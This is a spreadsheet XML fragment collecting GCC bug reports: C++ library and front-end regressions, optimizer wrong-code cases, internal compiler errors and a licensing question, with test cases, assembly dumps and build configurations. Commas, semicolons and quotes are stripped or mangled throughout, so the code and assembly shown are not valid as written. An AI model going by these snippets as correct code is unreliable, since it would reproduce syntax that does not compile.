http://gcc.gnu.org/ml/gcc-patches/2008-10/msg00436.html
http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2844.html
The patch still applies to the compiler itself. However the patch
doesn't handle issues addressed in update from N2831. Also library
part doesn't apply although I believe it would be trivial to update.</t>
  </si>
  <si>
    <t>GCC-42761</t>
  </si>
  <si>
    <t>std::bind doesn't work for simple class types</t>
  </si>
  <si>
    <t>Unfortunately this very simple example which we have been discussing for other reasons regresses very badly vs tr1. Unfortunately the C++ front-end doesn't seem ready for a conforming result_of :( Can we prepare a reduced testcase for Jason?
Maybe he can already tell us whether an error message of the form: sorry unimplemented: unable to determine the declared type of expression â€˜declval()()â€™ points to an issue fixable any time soon...
Otherwise I'm afraid that for 4.5.0 we have to revert consistently most C++0x work in .
///////////////
#include 
struct X {
  typedef int result_type
  int operator()() { return 0 }
  int operator()() const { return 1 }
}
const auto b = std::bind(X())
b() // b is const so must return 1</t>
  </si>
  <si>
    <t>GCC-72786</t>
  </si>
  <si>
    <t>Odd spelling suggestion with later defined macro: Suggestion is identical to unknown identifier</t>
  </si>
  <si>
    <t>The suggestion in the error message is odd:
inp5.ii:2:30: error: â€˜OVERRIDEâ€™ does not name a type did you mean â€˜OVERRIDEâ€™?
   virtual void clone() const OVERRIDE  { }
                              ^~~~~~~~
                              OVERRIDE
The reason for it is an ordering issue:
class DocTargetDriver {
  virtual void clone() const OVERRIDE  { }
}
#define OVERRIDE override
I am not sure how to best resolve it. Filtering out would be simple (input and output are identical) however I wonder whether it makes more sense to explicitly point out the ordering issue.</t>
  </si>
  <si>
    <t>GCC-16212</t>
  </si>
  <si>
    <t>ICE  ada/gcc-interface/trans.c:1626 on legal Ada 83 program</t>
  </si>
  <si>
    <t>pragma Ada_83
procedure Test_251265(x: integer) is
begin
   case x is
      when integer'last +1 =&gt; null
      when 0               =&gt; null -- line 5
      when others          =&gt; null
   end case
end Test_251265
$ gnatmake -q -O1 test_251265
+===========================GNAT BUG DETECTED==============================+
| 3.15p  (20020523) (i486-pc-linux-gnu) Gigi abort Code=316               |
| Error detected at test_251265.adb:4:9                                    |
| Please submit bug report by email to report@gnat.com.                    |
| Use a subject line meaningful to you and us to track the bug.            |
| (include your customer number #nnn in the subject line).                 |
| Include the entire contents of this bug box in the report.               |
| Include the exact gnatgcc or gnatmake command that you entered.          |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
| (use plain ASCII or MIME attachment or FTP to your customer directory). |
| See README.GNATPRO for full info on procedure for submitting bugs.       |
+==========================================================================+
Please include these source files with error report
test_251265.adb
compilation abandoned
gnatmake: test_251265.adb compilation error</t>
  </si>
  <si>
    <t>GCC-53844</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] GCC generates suboptimal code for unused members of classes in some cases on multiple targets.</t>
  </si>
  <si>
    <t>Created attachment 27737
Source file for which suboptimal code is generated (self contained)
The attached source file contains a very minimal cut out part of a numerics library with expression templates which was exhibiting poor performance. The poor performance is due to the compiler emitting instructions to push variables onto the stack which are ultimately never used.
The attached file seems to be the smallest which replicates the behaviour. Compiled with:
g++-4.7  -S minimal.cc -O3 
The output generated is:
_Z4testRK6VectorI5VBaseERS1_i:
.LFB8:
	.cfi_startproc
	subq	$160 %rsp
	.cfi_def_cfa_offset 168
	movq	(%rsi) %rcx
	movq	(%rdi) %rdx
	leaq	-120(%rsp) %rax
	movl	$1 8(%rsp)
	movl	$1 -8(%rsp)
	movl	$1 -24(%rsp)
	movl	$1 -40(%rsp)
	movq	%rax 24(%rsp)
	leaq	-104(%rsp) %rax
	movl	$1 -56(%rsp)
	movl	$1 -72(%rsp)
	movl	$1 -88(%rsp)
	movq	%rax 40(%rsp)
	leaq	24(%rsp) %rax
	movl	$1 -104(%rsp)
	movl	$1 -120(%rsp)
	movq	%rdi 32(%rsp)
	movq	%rax 48(%rsp)
	leaq	-88(%rsp) %rax
	movq	%rax 56(%rsp)
	leaq	40(%rsp) %rax
	movq	%rax 64(%rsp)
	leaq	-72(%rsp) %rax
	movq	%rax 72(%rsp)
	leaq	56(%rsp) %rax
	movq	%rax 80(%rsp)
	leaq	-56(%rsp) %rax
	movq	%rax 88(%rsp)
	leaq	72(%rsp) %rax
	movq	%rax 96(%rsp)
	leaq	-40(%rsp) %rax
	movq	%rax 104(%rsp)
	leaq	88(%rsp) %rax
	movq	%rax 112(%rsp)
	leaq	-24(%rsp) %rax
	movq	%rax 120(%rsp)
	leaq	104(%rsp) %rax
	movq	%rax 128(%rsp)
	leaq	-8(%rsp) %rax
	movq	%rax 136(%rsp)
	leaq	120(%rsp) %rax
	movq	%rax 144(%rsp)
	xorl	%eax %eax
	.p2align 410
	.p2align 3
.L2:
	movsd	(%rdx%rax) %xmm0
	movsd	%xmm0 (%rcx%rax)
	addq	$8 %rax
	cmpq	$800 %rax
	jne	.L2
	addq	$160 %rsp
	.cfi_def_cfa_offset 8
	ret
	.cfi_endproc
This majority of the instructions correspond to pushing the numbers (line 68 of the source file) and corresponding reference (line 39 of the source file) onto the stack. 
The behaviour is quite changable. For example replacing the assignment with
	const auto
	out=v
and enabling C++11 produces much worse results. 
The main compiler tested was:
COLLECT_GCC=g++-4.7
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.7.0/configure --program-suffix=-4.7 --enable-languages=cc++
Thread model: posix
gcc version 4.7.0 (GCC) 
The source has been tried with a number of other compilers in 32 and 64 bit mode where applicable with similar results. The compilers are:
COLLECT_GCC=arm-linux-gnueabi-g++-4.6
COLLECT_LTO_WRAPPER=/usr/lib/gcc/arm-linux-gnueabi/4.6.1/lto-wrapper
Target: arm-linux-gnueabi
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.6.1-9ubuntu3' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/arm-linux-gnueabi/include/c++/4.6.1 --libdir=/usr/lib --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-objc-gc --enable-multilib --disable-sjlj-exceptions --with-arch=armv7-a --with-float=softfp --with-fpu=vfpv3-d16 --with-mode=thumb --disable-werror --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=arm-linux-gnueabi --program-prefix=arm-linux-gnueabi- --includedir=/usr/arm-linux-gnueabi/include --with-headers=/usr/arm-linux-gnueabi/include --with-libs=/usr/arm-linux-gnueabi/lib
Thread model: posix
gcc version 4.6.1 (Ubuntu/Linaro 4.6.1-9ubuntu3) 
Using built-in specs.
COLLECT_GCC=/usr/bin/g++-4.6.real
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.6.1-9ubuntu3' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.1 (Ubuntu/Linaro 4.6.1-9ubuntu3) 
Using built-in specs.
COLLECT_GCC=/usr/bin/g++-4.5.real
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.5.4/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.5.3-9ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.5/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.5 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.5 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-gold --enable-ld=default --with-plugin-ld=ld.gold --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.5.4 (Ubuntu/Linaro 4.5.3-9ubuntu1) 
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.4.6-11ubuntu2' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.4 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.4.6 (Ubuntu/Linaro 4.4.6-11ubuntu2)</t>
  </si>
  <si>
    <t>GCC-15941</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] new fails gcc.dg/compat/struct-by-value-11 and gcc.dg/compat/struct-by-value-1</t>
  </si>
  <si>
    <t>The following new fails occured
Executing on host: /xxx/gnu/gcc-3.4/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.4/objdir/gc
c/ c_compat_main_tst.o c_compat_x_tst.o c_compat_y_tst.o     -lm   -o gcc-dg-com
pat-struct-by-value-11-01    (timeout = 300)
PASS: gcc.dg/compat/struct-by-value-11 c_compat_x_tst.o-c_compat_y_tst.o link
Setting LD_LIBRARY_PATH to :/usr/openwin/lib
FAIL: gcc.dg/compat/struct-by-value-11 c_compat_x_tst.o-c_compat_y_tst.o execute
Executing on host: /xxx/gnu/gcc-3.4/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.4/objdir/gc
c/ c_compat_main_tst.o c_compat_x_tst.o c_compat_y_tst.o     -lm   -o gcc-dg-com
pat-struct-by-value-1-01    (timeout = 300)
PASS: gcc.dg/compat/struct-by-value-1 c_compat_x_tst.o-c_compat_y_tst.o link
Setting LD_LIBRARY_PATH to :/usr/openwin/lib
FAIL: gcc.dg/compat/struct-by-value-1 c_compat_x_tst.o-c_compat_y_tst.o execute
This is for
-bash-2.05b$ ../xgcc -B../ -v
Reading specs from ../specs
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as
--enable-shared --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-3.4.1
--enable-debug=no --disable-nls
Thread model: single
gcc version 3.4.1 20040609 (prerelease)</t>
  </si>
  <si>
    <t>GCC-58228</t>
  </si>
  <si>
    <t>[4.7 Regression] wrong code (with vectorization?) at -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk as well as gcc 4.7 and 4.8 produces wrong code for the following testcase on x86_64-linux when compiled at -O3 in both 32-bit and 64-bit modes. This is a regression from 4.6.x.
This seems to do with vectorization as it goes away with -fno-tree-vectorize. 
$ gcc-trunk -v
gcc version 4.9.0 20130822 (experimental) [trunk revision 201915] (GCC) 
$ gcc-4.6 -O3 reduced.c
$ a.out
1
$ gcc-4.7 -O3 reduced.c
$ a.out
0
$ gcc-4.8 -O3 reduced.c
$ a.out
0
$ gcc-trunk -O3 reduced.c
$ a.out
0
$ gcc-trunk -O3 -fno-tree-vectorize reduced.c
$ a.out
1
$ 
--------------------------------------------
int printf (const char * ...)
int a[8][8] = {{1}}
int b c d e
int main ()
{
  for (c = 0 c &lt; 8 c++)
    for (b = 0 b &lt; 2 b++)
      a[b + 4][c] = a[c][0]
  printf (%d\n a[4][4])
  return 0
}</t>
  </si>
  <si>
    <t>GCC-64191</t>
  </si>
  <si>
    <t>[4.9 Regression] indirect clobbers messes up dead code elimination in loop calling dtor</t>
  </si>
  <si>
    <t>Without -march=native the loops in the 3 fns are eliminated as expected resulting in single retq's.
With -march=native the loop which calls the defined but empty dtor is compiled into something rather weird. However the other empty Nop() call is optimized away as expected.
g++-5.0.0 -g -O3 -Wall -Wextra -c 20141205-dtor_loop.cpp 
g++-5.0.0 -g -O3 -Wall -Wextra -o 20141205-dtor_loop 20141205-dtor_loop.o
Dump of assembler code for function foo_dtor_loop(Foo* unsigned int):
   0x0000000000400570 :	repz retq   
Dump of assembler code for function bar_dtor_loop(Bar* unsigned int):
   0x0000000000400580 :	repz retq 
Dump of assembler code for function bar_nop_loop(Bar* unsigned int):
   0x0000000000400590 :	repz retq 
So far so good.
g++-5.0.0 -g -O3 -march=native -Wall -Wextra -c 20141205-dtor_loop.cpp 
g++-5.0.0 -g -O3 -march=native -Wall -Wextra -o 20141205-dtor_loop 20141205-dtor_loop.o
Dump of assembler code for function foo_dtor_loop(Foo* unsigned int):
   0x0000000000400570 :	retq   
Dump of assembler code for function bar_dtor_loop(Bar* unsigned int):
   0x0000000000400578 :     test   %rdi%rdi
   0x000000000040057b :     je     0x4005b8 
   0x000000000040057d :     mov    %esi%esi
   0x000000000040057f :     lea    (%rdi%rsi4)%rax
   0x0000000000400583 :    cmp    %rax%rdi
   0x0000000000400586 :    jae    0x4005b8 
   0x0000000000400588 :    mov    $0x3%edx
   0x000000000040058d :    lea    -0x4(%rax)%rsi
   0x0000000000400591 :    sub    %rdi%rdx
   0x0000000000400594 :    add    %rsi%rdx
   0x0000000000400597 :    mov    %rdx%rcx
   0x000000000040059a :    shr    $0x2%rcx
   0x000000000040059e :    lea    0x1(%rcx)%r8
   0x00000000004005a2 :    dec    %rcx
   0x00000000004005a5 :    shr    %rcx
   0x00000000004005a8 :    lea    0x2(%rcx%rcx1)%rcx
   0x00000000004005ad :    cmp    $0x2f%rdx
   0x00000000004005b1 :    jbe    0x4005b8 
   0x00000000004005b3 :    cmp    %rcx%r8
   0x00000000004005b6 :    je     0x4005b8 
   0x00000000004005b8 :    retq   
Dump of assembler code for function bar_nop_loop(Bar* unsigned int):
   0x00000000004005c0 :     retq   
The bar_dtor_loop() fn is clearly a mess unfortunately I can't follow the computation.
The bar_inc_loop() does a single int increment on each object to see what loop code is generated if not empty fns are called. It is as expected: the loop is unrolled 16x times and the residual part is executed in a tight loop:
   0x0000000000400648 :	sub    $0x4%rdx
   0x000000000040064c :	incl   (%rdx)
   0x000000000040064e :	cmp    %rdx%rdi
   0x0000000000400651 :	jb     0x400648 
g++-5.0.0 -v
Using built-in specs.
COLLECT_GCC=g++-5.0.0
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --enable-languages=cc++ --disable-multilib --program-suffix=-5.0.0
Thread model: posix
gcc version 5.0.0 20141027 (experimental) (GCC)
cat /proc/cpuinfo 
processor	: 0
vendor_id	: AuthenticAMD
cpu family	: 21
model		: 1
model name	: AMD FX(tm)-8150 Eight-Core Processor
stepping	: 2
microcode	: 0x6000626
cpu MHz		: 1400.000
cache size	: 2048 KB
physical id	: 0
siblings	: 8
core id		: 0
cpu cores	: 4
apicid		: 16
initial apicid	: 0
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold
bugs		: fxsave_leak
bogomips	: 7624.63
TLB size	: 1536 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 48 bits physical 48 bits virtual
power management: ts ttp tm 100mhzsteps hwpstate cpb
Unfortunately I couldn't test with the latest version since the build fails with
../.././libcc1/findcomp.cc:20:20: fatal error: config.h: No such file or directory
a while know even after deleting everything and doing a git reset --hard HEAD.
----8&lt;----8&lt;----8&lt;----
struct Foo
{
        int i
}
void foo_dtor_loop(Foo* p unsigned int n)
{
        if (p) {
                Foo* e = p + n
                while (e &gt; p) {
                        --e
                        e-&gt;~Foo()
                }
        }
}
struct Bar
{
        int i
        ~Bar() { }
        void Nop() { }
        void Inc() { ++i }
}
void bar_dtor_loop(Bar* p unsigned int n)
{
        if (p) {
                Bar* e = p + n
                while (e &gt; p) {
                        --e
                        e-&gt;~Bar()
                }
        }
}
void bar_nop_loop(Bar* p unsigned int n)
{
        if (p) {
                Bar* e = p + n
                while (e &gt; p) {
                        --e
                        e-&gt;Nop()
                }
        }
}
void bar_inc_loop(Bar* p unsigned int n)
{
        if (p) {
                Bar* e = p + n
                while (e &gt; p) {
                        --e
                        e-&gt;Inc()
                }
        }
}
int main()
{
}</t>
  </si>
  <si>
    <t>petschy</t>
  </si>
  <si>
    <t>GCC-3149</t>
  </si>
  <si>
    <t>Ready 275: Wrong type in num_get::get() overloads</t>
  </si>
  <si>
    <t>see:
http://anubis.dkuug.dk/jtc1/sc22/wg21/docs/lwg-active.html#275
Release:
20010605 cvs
Environment:
source
How-To-Repeat:
observe include/bits/local_facets.h line 584.
Note that the version for float&amp; already exists on line 630.</t>
  </si>
  <si>
    <t>GCC-4418</t>
  </si>
  <si>
    <t>License is unclear</t>
  </si>
  <si>
    <t>None of the documentation specifies what the license is (so far as I can see). There is a file included in the documentation called COPYING which is a copy of version 2 of the GPL but none of the other documentation refers to this.
There is clearly some confusion in the free software community as to exactly what the license is. I have seen references to a Runtime GPL or relaxed GPL neither of which terms I have seen before. The Freshmeat entry simply says the license is GPL.
Release:
gcc-3.0.1
How-To-Repeat:
1. Search the distributed documentation for a mention of the license.
2. Google for libstdc++ license.</t>
  </si>
  <si>
    <t>ben.hutchings</t>
  </si>
  <si>
    <t>GCC-37598</t>
  </si>
  <si>
    <t>[ira-merge] FAIL: gcc.target/i386/asm-3.c execution test</t>
  </si>
  <si>
    <t>On Linux/ia32 and Linux/x86-64 this patch
http://gcc.gnu.org/ml/gcc-patches/2008-09/msg01176.html
caused
FAIL: gcc.target/i386/asm-3.c execution test
on ira-merge branch.</t>
  </si>
  <si>
    <t>GCC-48156</t>
  </si>
  <si>
    <t>[4.6 Regression] wrong code with -fcrossjumping</t>
  </si>
  <si>
    <t>Created attachment 23684
reduced testcase
Output:
$ gcc -O -fcrossjumping --param min-crossjump-insns=1 testcase.c
$ ./a.out 
Aborted
Tested revisions:
r171047 - fail
4.6 r170955 - fail
4.5 r170955 - OK</t>
  </si>
  <si>
    <t>GCC-38405</t>
  </si>
  <si>
    <t>[4.4 Regression] (silent failure) handling bitfield in ternary</t>
  </si>
  <si>
    <t xml:space="preserve">
	In the context of a function returning int and rfp-&gt;signed is a one-bit field
	return rfp-&gt;signed_flag ? 1 : 0
	yields -1.  This is an optimization problem seen with -O2 but not -O1.
	Isolated to -ftree-vrp.  Not seen in gcc-4.3 or earlier.
Environment:
System: Linux recycle 2.6.26-1-amd64 #1 SMP Sat Oct 18 15:27:18 UTC 2008 x86_64 GNU/Linux
host: x86_64-pc-linux-gnu
build: x86_64-pc-linux-gnu
target: x86_64-pc-linux-gnu
configured with: ../src/configure -v --with-pkgversion='Debian 20081130-1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cc++javafortranobjcobj-c++ada --prefix=/usr/lib/gcc-snapshot --enable-shared --with-system-zlib --disable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk --enable-gtk-cairo --disable-plugin --with-java-home=/usr/lib/gcc-snapshot/java-1.5.0-gcj-4.4-1.5.0.0/jre --enable-java-home --with-jvm-root-dir=/usr/lib/gcc-snapshot/jvm --with-jvm-jar-dir=/usr/lib/gcc-snapshot/jvm-exports --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-mpfr --enable-cld --disable-werror --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
How-To-Repeat:
Short way:
$ gcc -Wall -O1 -ftree-vrp ternbug.c -o ternbug &amp;&amp; ./ternbug
Hello world: -1
FAIL
$ 
Long way:
$ /usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/4.4.0/cc1 -fpreprocessed ternbug.i -quiet -dumpbase ternbug.c -mtune=generic -auxbase ternbug -O1 -ftree-vrp -version -o ternbug.s
GNU C (Debian 20081130-1) version 4.4.0 20081130 (experimental) [trunk revision 142292] (x86_64-linux-gnu)
        compiled by GNU C version 4.4.0 20081130 (experimental) [trunk revision 142292] GMP version 4.2.2 MPFR version 2.3.2.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: ef8facef55b835d47393957737fa78a4
$ as -V -Qy -o ternbug.o ternbug.s
GNU assembler version 2.18.0 (x86_64-linux-gnu) using BFD version (GNU Binutils for Debian) 2.18.0.20080103
$ /usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/4.4.0/collect2 --eh-frame-hdr -m elf_x86_64 -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o ternbug /usr/lib/../lib/crt1.o /usr/lib/../lib/crti.o /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.4.0/crtbegin.o -L/usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.4.0 -L/usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.4.0/../../../../lib -L/lib/../lib -L/usr/lib/../lib -L/usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.4.0/../../.. ternbug.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc-snapshot/lib/gcc/x86_64-linux-gnu/4.4.0/crtend.o /usr/lib/../lib/crtn.o
$ ./ternbug
Hello world: -1
FAIL
$ 
Minimal test case ternbug.{ci}:
extern int printf (__const char *__restrict __format ...)
struct vpiBinaryConst {
 int signed_flag :1
 int sized_flag :1
}
int binary_get(int code struct vpiBinaryConst *rfp)
{
 switch (code) {
  case 1:
   return rfp-&gt;signed_flag ? 1 : 0
  default:
   printf(error: %d not supported\n code)
   return 0
 }
}</t>
  </si>
  <si>
    <t>ldoolitt</t>
  </si>
  <si>
    <t>GCC-1646</t>
  </si>
  <si>
    <t>The GNATS query filters do not work correctly</t>
  </si>
  <si>
    <t>Go to the GNATSWEB interface select query and in the
query form select Category C.  Hit submit and observe
that you get far more than C bugs listed.
Release:
Current web
How-To-Repeat:
Go to the GNATSWEB interface select query and in the
query form select Category C.  Hit submit and observe
that you get far more than C bugs listed.</t>
  </si>
  <si>
    <t>GCC-49352</t>
  </si>
  <si>
    <t>[4.7 Regression] -fcompare-debug failure with -O2 -ftree-vectorize</t>
  </si>
  <si>
    <t>Created attachment 24481
reduced testcase
Compiler output:
$ gcc -O2 -ftree-vectorize -fcompare-debug testcase.c
gcc: error: testcase.c: -fcompare-debug failure (length)
The code is not vectorized with -g.
Tested revisions:
r174860 - fail
4.6 r173059 - OK</t>
  </si>
  <si>
    <t>GCC-69126</t>
  </si>
  <si>
    <t>[6 regression] _Pragma does not apply if part of a macro</t>
  </si>
  <si>
    <t>$ cat /tmp/test.cpp
#pragma GCC diagnostic push
int f()
{
    _Pragma(GCC diagnostic ignored \-Wunused-variable\)
    int x
    return 0
}
#pragma GCC diagnostic pop
#pragma GCC diagnostic push
#define MACRO \
    _Pragma(GCC diagnostic ignored \-Wunused-variable\) \
    int x
int g()
{
    MACRO
    return 0
}
#pragma GCC diagnostic pop
With GCC 4.8.5 or 5.3.1:
$ gcc -O2 -Wall -c /tmp/test.cpp  
[nothing printed]
With GCC 6:
$ ~/gcc6/bin/gcc -O2 -Wall -c /tmp/test.cpp  
/tmp/test.cpp: In function â€˜int g()â€™:
/tmp/test.cpp:13:9: warning: unused variable â€˜xâ€™ [-Wunused-variable]
     int x
         ^
/tmp/test.cpp:17:5: note: in expansion of macro â€˜MACROâ€™
     MACRO
     ^~~~~
GCC 6 built from trunk last night (20160103).</t>
  </si>
  <si>
    <t>GCC-38937</t>
  </si>
  <si>
    <t>[4.4 Regression] dereferencing pointer '' does break  strict-aliasing</t>
  </si>
  <si>
    <t>On s390x there are some libstdc++ failures that are not present on other platforms. 
Here is a representative test run:
http://gcc.gnu.org/ml/gcc-testresults/2009-01/msg02102.html
And here is the failure analysis:
http://gcc.gnu.org/ml/libstdc++/2009-01/msg00109.html
The following fails appear to be spurious and only occur on s390x. At first I thought this might be because of the extra flags -fstack-protector --param=ssp-buffer-size=4 but compiling the problem testcases on x86_64/linux with the same flag doesn't show an error. So I don't know what's up.
The same testcases (when present) pass without error on 4.3.2.
FAIL: 21_strings/basic_string/element_access/wchar_t/empty.cc
FAIL: 23_containers/list/modifiers/1.cc
FAIL: 23_containers/list/modifiers/3.cc
FAIL: 23_containers/list/modifiers/insert/25288.cc
The usual error looks like:
warning: dereferencing pointer '' does break strict-aliasing
rules
which is incomprehensible.</t>
  </si>
  <si>
    <t>GCC-18107</t>
  </si>
  <si>
    <t>[4.0 Regression] [meta-bug]  Bootstrap fails on i686-pc-mingw32</t>
  </si>
  <si>
    <t>This is a meta-bug for all of the things causing a Windows bootstrap to fail. 
This should be closed when i686-pc-mingw32 successfully completes a full bootstrap.</t>
  </si>
  <si>
    <t>GCC-43084</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE -fipa-struct-reorg -g (VTA)</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -fipa-struct-reorg -fwhole-program -fipa-type-escape -g testcase.c
Tested revisions:
r156745 - crash
r153685 - crash
4.4 r156256 - OK (with checking)
Output:
$ /mnt/svn/gcc-trunk/binary-156745-lto/bin/gcc -O1 -fipa-struct-reorg -fwhole-program -fipa-type-escape -g testcase.c
testcase.c: In function main:
testcase.c:10:1: internal compiler error: in find_new_var_of_type at ipa-struct-reorg.c:604
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Valgrind:
no errors reported</t>
  </si>
  <si>
    <t>GCC-2624</t>
  </si>
  <si>
    <t>gcc 2.95 on Solaris 2.6 - Internal compiler error in `change_address'</t>
  </si>
  <si>
    <t>Command line used to trigger the bug :
/usr/local/bin/g++ -O -fPIC -DMVE_OPT -DMVE_SUN -DMVE_FLTK_OPTION=SUN.OPT.GCC -D__EXTENSIONS__ -DMVE_EGCS -DMVE_SUN_GCC -DMVE_STD -I. -I/home/rob/dev/utils/fltk/fltk-1.0.9/main/bazaar -I/home/rob/dev/utils/fltk/fltk-1.0.9/main -I/home/rob/dev/utils/fltk/fltk-1.0.9/main/bazaar/FL -isystem /usr/openwin/include -isystem /usr/openwin/include/X11 -isystem /usr/dt/include -c Fl_Cursor_Shape.cxx -obj_files/SUN.OPT/GCC/Fl_Cursor_Shape.o
Compiler ouput :
Fl_Cursor_Shape.cxx: In function `unsigned int intelSwap32(unsigned int)':
Fl_Cursor_Shape.cxx:117: Internal compiler error in `change_address' at emit-rtl.c:1604
Please submit a full bug report.
See  for instructions.
Please note that compiling the same file with the following options (i.e. a debug build) does not cause the problem to occur 
/usr/local/bin/g++   -g -fno-inline -fno-default-inline -fPIC -DMVE_DEBUG -DMVE_SUN  -DMVE_FLTK_OPTION=SUN.DEBUG.GCC  -D__EXTENSIONS__   -DMVE_EGCS -DMVE_SUN_GCC -DMVE_STD  -I. -I/home/rob/dev/utils/fltk/fltk-1.0.9/main/bazaar -I/home/rob/dev/utils/fltk/fltk-1.0.9/main -I/home/rob/dev/utils/fltk/fltk-1.0.9/main/bazaar/FL   -isystem /usr/openwin/include -isystem /usr/openwin/include/X11 -isystem /usr/dt/include  -c Fl_Cursor_Shape.cxx -o obj_files/SUN.DEBUG/GCC/Fl_Cursor_Shape.o
Release:
gcc version 2.95.2 19991024 (release)
Environment:
sparc-sun-solaris2.6. Sun Ultra 60 with 1GB RAM</t>
  </si>
  <si>
    <t>GCC-2069</t>
  </si>
  <si>
    <t>Preprocessor defines machine-type=1</t>
  </si>
  <si>
    <t>The preprocessor defines i386 and i486 to be equal to 1.
This makes it impossible to compile X (XFree86 3.3.6).
X builds itself with imake and imake runs cpp on all its
input. This means that -mcpu=i486 in the compiler flags will
get translated to -mcpu=1. It also results in complaints
about no headers being in /usr/lib/gcc-lib/1-pc-linux-gnu/...
and other more subtle problems. 2.95.2.1 does not exhibit
this behaviour (although I haven't tried building X with it yet).
Release:
gcc version 2.95.3 20010125 (prerelease)
Environment:
i486-pc-linux-gnu
AMD 5x86 Linux 2.4.2 Glibc 2.2.2
How-To-Repeat:
uname -m (or echo i486) | gcc -E -
Second line of output with 2.95.3 will be 1
On 2.95.2.1 it will be (in my case) i486</t>
  </si>
  <si>
    <t>rbt</t>
  </si>
  <si>
